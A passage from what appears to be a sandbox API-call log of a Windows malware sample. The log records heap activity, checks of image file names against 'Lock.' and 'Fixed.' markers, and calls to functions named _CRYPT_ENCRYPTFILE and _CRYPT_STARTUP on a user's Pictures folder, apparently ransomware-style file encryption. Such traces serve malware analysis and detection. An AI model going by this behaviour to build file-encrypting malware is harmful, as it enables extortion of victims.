hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0254.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.555] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0254.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0254.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Th2s_hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2s_hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2s_hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s_hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nP9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cJx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jx5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0254.556] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0254.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0254.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0254.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0254.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Th2s_hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2s_hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2s_hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s_hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nP9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cJx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jx5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.558] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0254.558] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0254.558] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0254.558] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0254.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0254.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0254.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0254.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0254.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0254.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0254.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Th2s_hnP9cJx5.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5679540, ftCreationTime.dwHighDateTime=0x1d5f06b, ftLastAccessTime.dwLowDateTime=0x44781320, ftLastAccessTime.dwHighDateTime=0x1d5ec01, ftLastWriteTime.dwLowDateTime=0x44781320, ftLastWriteTime.dwHighDateTime=0x1d5ec01, nFileSizeHigh=0x0, nFileSizeLow=0x3ad6, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Th2s_hnP9cJx5.bmp", cAlternateFileName="TH2S_H~1.BMP")) returned 0xa87710 [0254.655] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0254.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.657] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.657] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0254.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.657] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0254.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0254.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0254.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0254.658] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0254.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0254.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0254.658] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0254.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0254.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, 